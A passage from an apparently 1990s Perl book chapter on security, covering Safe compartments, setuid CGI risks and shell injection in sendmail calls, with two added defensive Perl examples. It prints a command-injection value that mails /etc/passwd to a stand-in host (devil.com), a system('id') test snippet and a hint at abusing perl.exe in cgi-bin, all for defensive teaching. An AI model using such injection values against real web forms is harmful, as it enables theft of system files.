#<BR>
while (<DBFILE>)<BR>
</FONT></TT> <TT><FONT FACE="Courier"> {
<BR>
print $_;<BR>
</FONT></TT> <TT><FONT FACE="Courier"> }
<BR>
}<BR>
<BR>
$secure->share('&safecode', DBFILE);</FONT></TT>
</BLOCKQUOTE>
<P>
The <TT><FONT FACE="Courier">trap()</FONT></TT> and <TT><FONT FACE="Courier">untrap()</FONT></TT>
methods force the <TT><FONT FACE="Courier">Safe</FONT></TT> package
to trap and untrap instructions, respectively. The names of the
operators available to your program are listed in <TT><FONT FACE="Courier">opcode.pl</FONT></TT>
and <TT><FONT FACE="Courier">opcode.h</FONT></TT>. The <TT><FONT FACE="Courier">share()</FONT></TT>
method makes the values named in its argument list available
to the compartment's code. Therefore, the variables and statements
in the <TT><FONT FACE="Courier">safecode</FONT></TT> subroutine
are made available to the compartment. In the <TT><FONT FACE="Courier">safecode</FONT></TT>
compartment (shown previously), the <TT><FONT FACE="Courier">DBFILE</FONT></TT>
handle can be used in the subroutine <TT><FONT FACE="Courier">safecode</FONT></TT>
to retrieve the data.
<P>
The <TT><FONT FACE="Courier">Safe</FONT></TT> package also contains
utility subroutines for modifying name spaces and masks. To create
a mask from a list of operator names, use the <TT><FONT FACE="Courier">ops_to_mask()</FONT></TT>
function, which returns a mask in which only the operators named
in the function's argument list are masked. For example, to return
a mask with only <TT><FONT FACE="Courier">OP_SETPRIORITY</FONT></TT>
masked, use this call:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">@mymask = ops_to_mask(OP_SETPRIORITY);</FONT></TT>
</BLOCKQUOTE>
<P>
The inverse of this call is to get a list of operator names given
an operator mask: <TT><FONT FACE="Courier">mask_to_ops (MASK)</FONT></TT>.
The names returned are those operators that are masked for the
package. The function <TT><FONT FACE="Courier">fullmask()</FONT></TT>
returns all ones and <TT><FONT FACE="Courier">emptymask()</FONT></TT>
returns all zeros. The function <TT><FONT FACE="Courier">MAXO()</FONT></TT>
returns the number of operators in this version of Perl.
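<P>
The following is an added example, not code from the book: it builds a <TT><FONT FACE="Courier">Safe</FONT></TT> compartment, shares one variable into it the way the text shares <TT><FONT FACE="Courier">safecode</FONT></TT> and <TT><FONT FACE="Courier">DBFILE</FONT></TT>, traps the process and file operators, and then evaluates one harmless and one hostile snippet. It assumes Perl 5.6 or later, where <TT><FONT FACE="Courier">Safe</FONT></TT> is built on the <TT><FONT FACE="Courier">Opcode</FONT></TT> module and <TT><FONT FACE="Courier">deny()</FONT></TT>/<TT><FONT FACE="Courier">permit()</FONT></TT> have replaced the older <TT><FONT FACE="Courier">ops_to_mask()</FONT></TT>/<TT><FONT FACE="Courier">mask_to_ops()</FONT></TT> helpers.

```perl
#!/usr/bin/perl
# Added example (not from the book): evaluate untrusted code inside a Safe
# compartment. Assumed: Perl 5.6+, where Safe uses the Opcode module and
# deny()/permit() stand in for the book's trap()/untrap() and mask helpers.
use strict;
use warnings;
use Safe;

# Run one snippet of untrusted code in a fresh compartment and report
# the value it returned, any trap error, and the shared variable afterwards.
sub run_in_compartment {
    my ($code, $shared_total) = @_;
    my $cpt = Safe->new;

    # Like the book's share('&safecode', DBFILE): names listed here become
    # visible inside the compartment; everything else in main stays hidden.
    our $total = $shared_total;
    $cpt->share('$total');

    # Trap the file and process operators the chapter warns about, on top of
    # whatever the default operator mask already denies.
    $cpt->deny(qw(open unlink system exec backtick fork));

    my $result = $cpt->reval($code);
    return { result => $result, error => $@, total => $total };
}

# Constructed untrusted snippets: one that only does arithmetic on the
# shared variable, and one that tries to spawn a shell command.
my $harmless = '$total = $total * 2; $total + 1';
my $hostile  = 'system("id")';

my $ok = run_in_compartment($harmless, 20);
print "harmless: result=$ok->{result} total=$ok->{total}\n";   # 41 and 40

# The hostile snippet never runs: compilation fails with
# "'system' trapped by operation mask ..." and $@ carries the message.
my $bad = run_in_compartment($hostile, 0);
print "hostile: trapped -> $bad->{error}" if $bad->{error};
```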
<H2><A NAME="SetuidCGIScriptsandCGIwrap"><TT><FONT SIZE=5 COLOR=#FF0000 FACE="Courier">Setuid</FONT></TT><FONT SIZE=5 COLOR=#FF0000>
CGI Scripts and CGIwrap</FONT></A></H2>
<P>
CGI scripts are written in Perl mainly because of Perl's string-handling
capabilities, along with its other powerful features. It's therefore important
to discuss CGI security issues when using Perl.
<P>
A point to note about CGI scripts (which are more than likely
to be written in Perl): Most <TT><FONT FACE="Courier">httpd</FONT></TT>
daemons run as user "nobody" and do not change the <TT><FONT FACE="Courier">uid</FONT></TT>
to the CGI script's owner. Some daemons use a program called CGIwrap,
which provides a safer way to change user IDs. The latest version
of CGIwrap can be found with full documentation and source and
installation instructions at the following address:
<BLOCKQUOTE>
<TT><A HREF="http://wwwcgi.umr.edu/~cgiwrap" tppabs="http://wwwcgi.umr.edu/~cgiwrap">http://wwwcgi.umr.edu/~cgiwrap</A></TT>
</BLOCKQUOTE>
<P>
In any event, do not allow your CGI files the capability to write
to a file by giving write access to a "nobody" user.
Close your eyes and think of the entire sunsite archive on your
disk choking it to death. Whatever you do, never make CGI scripts
<TT><FONT FACE="Courier">setuid</FONT></TT>, period. <TT><FONT FACE="Courier">setuid</FONT></TT>
scripts have many more security holes than do normal CGI scripts
and are much more easily accessed from the rest of the world.
<P>
The easiest way to exploit <TT><FONT FACE="Courier">setuid</FONT></TT>
scripts is by modifying any used environment variables. Old versions
of Perl used to call the <TT><FONT FACE="Courier">csh</FONT></TT>
to process globs of the form <TT><FONT FACE="Courier"><*.c></FONT></TT>
in <TT><FONT FACE="Courier">eval</FONT></TT> statements. Providing
your own version of <TT><FONT FACE="Courier">csh</FONT></TT> for
the Perl interpreter could get you running as root.
<P>
Finally, the biggest faux pas of all is to place <TT><FONT FACE="Courier">perl.exe</FONT></TT>
in your <TT><FONT FACE="Courier">cgi-bin</FONT></TT> directory.
Do not do this! Putting your Perl.exe program in a globally executable
area is unforgivable because all you have to do is change the
top line of every Perl CGI script to point to Perl.
<P>
If you see a site being accessed via a URL as
<BLOCKQUOTE>
<TT>http://somewhere.com/cgibin/perl.exe?dothis.pl</TT>
</BLOCKQUOTE>
<P>
you know you are dealing with someone who is not concerned about
potentially running any script on his or her computer. How to
do this is left as an exercise for the reader. (Hint: try to recall
the command-line arguments to Perl.) Actually, messages posted on
some newsgroups indicate that the regular search engines, such as
AltaVista, turn up sites with gaping chasms in their security.
<P>
A common mistake in Perl is to use the following line in a <TT><FONT FACE="Courier">cgi-script</FONT></TT>:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">system("/usr/sbin/sendmail -t $returnAddress < $data");</FONT></TT>
</BLOCKQUOTE>
<P>
The system call shown above sends the contents of <TT><FONT FACE="Courier">$data</FONT></TT>
to the address supplied in the variable <TT><FONT FACE="Courier">$returnAddress</FONT></TT>.
If the values in <TT><FONT FACE="Courier">$data</FONT></TT>
and <TT><FONT FACE="Courier">$returnAddress</FONT></TT> come from
environment variables, or worse yet, from <TT><FONT FACE="Courier">FORM</FONT></TT>
field entries, you are opening your system up to a hacker who
can supply the name of a valuable file in <TT><FONT FACE="Courier">$data</FONT></TT>.
A hacker will then be able to have anything returned, including password
files, through this hole. On the hacker's side, the request's
<TT><FONT FACE="Courier">VALUE</FONT></TT> would be set
to something like this:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">VALUE="khusain@ikra.com;mail nosy@devil.com </etc/passwd"</FONT></TT>
</BLOCKQUOTE>
<P>
In Perl, the <TT><FONT FACE="Courier">system</FONT></TT> command
is not the only command that will fork off a shell. Using <TT><FONT FACE="Courier">exec</FONT></TT>,
<TT><FONT FACE="Courier">eval</FONT></TT>, <TT><FONT FACE="Courier">pipe</FONT></TT>s,
or <TT><FONT FACE="Courier">backtick</FONT></TT>s will do the
same operation for you. The <TT><FONT FACE="Courier">eval</FONT></TT>
statement is potentially dangerous because it's the easiest to
bypass, even with the <TT><FONT FACE="Courier">-T</FONT></TT>
taint-checking flag turned on in Perl.
<P>
When sending mail, don't use <TT><FONT FACE="Courier">system()</FONT></TT>
calls. Rather, open a handle to <TT><FONT FACE="Courier">sendmail</FONT></TT>
directly. For example, use the following set of statements instead
of a system call:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">open(MAIL, "|/usr/lib/sendmail -t");<BR>
print MAIL "To: $myfriend\n";<BR>
...<BR>
close(MAIL);</FONT></TT>
</BLOCKQUOTE>
<P>
Note the use of <TT><FONT FACE="Courier">sendmail</FONT></TT>,
not <TT><FONT FACE="Courier">mail</FONT></TT>, in this example.
The <TT><FONT FACE="Courier">mail</FONT></TT> program has a bug
in it that allows you to execute commands by preceding them with
a tilde (<TT><FONT FACE="Courier">~</FONT></TT>). The bug has
been fixed on newer systems, but can be a potential threat if
your system is not up-to-date.
<P>
Finally, it's also known that some programs exploit escape characters
in UNIX to run commands. Some of these potentially dangerous escape
characters are the semicolon (for continuing commands), the tilde
(<TT><FONT FACE="Courier">~</FONT></TT>), the at sign (<TT><FONT FACE="Courier">@</FONT></TT>
in mail fraud), the bang operator (<TT><FONT FACE="Courier">!</FONT></TT>),
and so on. You should just prepend the escape characters with
the backslash, thus rendering these escape characters useless
for the first pass through the <TT><FONT FACE="Courier">eval()</FONT></TT>
in Perl:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">sub sanctify {<BR>
# Escape shell metacharacters in each argument;<BR>
# for example, user!sh becomes user\!sh<BR>
my @a = @_;<BR>
foreach (@a) {<BR>
s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;<BR>
}<BR>
return @a;<BR>
}</FONT></TT>
</BLOCKQUOTE>
<P>
The solution will only catch and replace those characters shown
here. You should look at your system closely to see what other
characters may cause potential problems.
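<P>
The following is an added example, not code from the book: it takes the chapter's <TT><FONT FACE="Courier">sendmail</FONT></TT> snippet and rewrites it so that form input never reaches a shell at all, by checking <TT><FONT FACE="Courier">$returnAddress</FONT></TT> against an allow-list pattern (which also untaints it under <TT><FONT FACE="Courier">-T</FONT></TT>) and by opening <TT><FONT FACE="Courier">sendmail</FONT></TT> with the list form of <TT><FONT FACE="Courier">open()</FONT></TT> instead of a shell command line. It assumes <TT><FONT FACE="Courier">sendmail</FONT></TT> lives at <TT><FONT FACE="Courier">/usr/lib/sendmail</FONT></TT>, as in the book's pipe example; the hostile address is the book's own <TT><FONT FACE="Courier">VALUE</FONT></TT>.

```perl
#!/usr/bin/perl
# Added example (not from the book): the chapter's mail-sending CGI snippet
# rewritten so that form input never reaches a shell. Run it with perl -T.
# Assumed: sendmail lives at /usr/lib/sendmail, as in the book's pipe example.
use strict;
use warnings;

# Allow-list check for the return address. Only characters that belong in a
# plain user@host address pass, so ";", "<", "|" and the like are rejected
# outright instead of escaped. The capture also untaints the value under -T.
sub clean_address {
    my ($addr) = @_;
    return unless defined $addr
        && $addr =~ /^([A-Za-z0-9._%+-]+\@[A-Za-z0-9.-]+\.[A-Za-z]{2,})$/;
    return $1;
}

# The list form of open() hands each argument straight to execvp(), so no
# shell ever parses the address and a metacharacter has nothing to exploit.
# "-t" makes sendmail take the recipient from the To: header, as in the book.
sub send_reply {
    my ($return_address, $body) = @_;
    my $to = clean_address($return_address)
        or die "Refusing to mail: bad return address\n";

    local $ENV{PATH} = '/usr/bin:/bin';    # -T requires a clean PATH before exec
    open(my $mail, '|-', '/usr/lib/sendmail', '-t')
        or die "Cannot run sendmail: $!\n";
    print $mail "To: $to\n";
    print $mail "Subject: Your request\n\n";
    print $mail $body;
    close($mail) or die "sendmail exited with status $?\n";
    return 1;
}

# Constructed inputs: the book's hostile VALUE and a legitimate address.
# send_reply() is not invoked here so the demo runs without a mailer.
my $hostile = 'khusain@ikra.com;mail nosy@devil.com </etc/passwd';
my $good    = 'khusain@ikra.com';
print defined clean_address($hostile) ? "accepted\n" : "rejected hostile address\n";
print defined clean_address($good)    ? "accepted good address\n" : "rejected\n";
```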
<H2><A NAME="ReferenceBooks"><FONT SIZE=5 COLOR=#FF0000>Reference
Books</FONT></A></H2>
<P>
The following texts will provide you with more information about
security and Perl scripts. Please remember that this is only a
partial list:
<UL>
<LI><I>Practical UNIX Security</I>, Simson Garfinkel and Gene Spafford,
O'Reilly & Associates, 1-56592-148-8, 1996.
<LI><I>Firewalls and Internet Security</I>, William Cheswick and
Steven M. Bellovin, Addison-Wesley, 0-201-63357-4, 1994.
<LI><I>Essential System Administration</I>, Aeleen Frisch, O'Reilly
& Associates, Second edition, 1-56592-127-5, 1995.
</UL>
<H2><A NAME="Summary"><FONT SIZE=5 COLOR=#FF0000>Summary</FONT></A>
</H2>
<P>
Security issues are becoming increasingly important in the computing
world today. As more computers go online, more machines are being
opened up for attacks by hackers, especially because more CGI
scripts are written in Perl. Use the <TT><FONT FACE="Courier">-T</FONT></TT>
taint feature in Perl 5. Use the <TT><FONT FACE="Courier">Safe.pm</FONT></TT>
module if you can. Also, never place <TT><FONT FACE="Courier">perl.exe</FONT></TT>
in the <TT><FONT FACE="Courier">cgi-bin</FONT></TT> directory
and never let your Perl scripts run off a shell command that cannot
be written to. Remember that keeping Perl scripts secure in CGI
environments is an ongoing issue.
</BODY>
</HTML>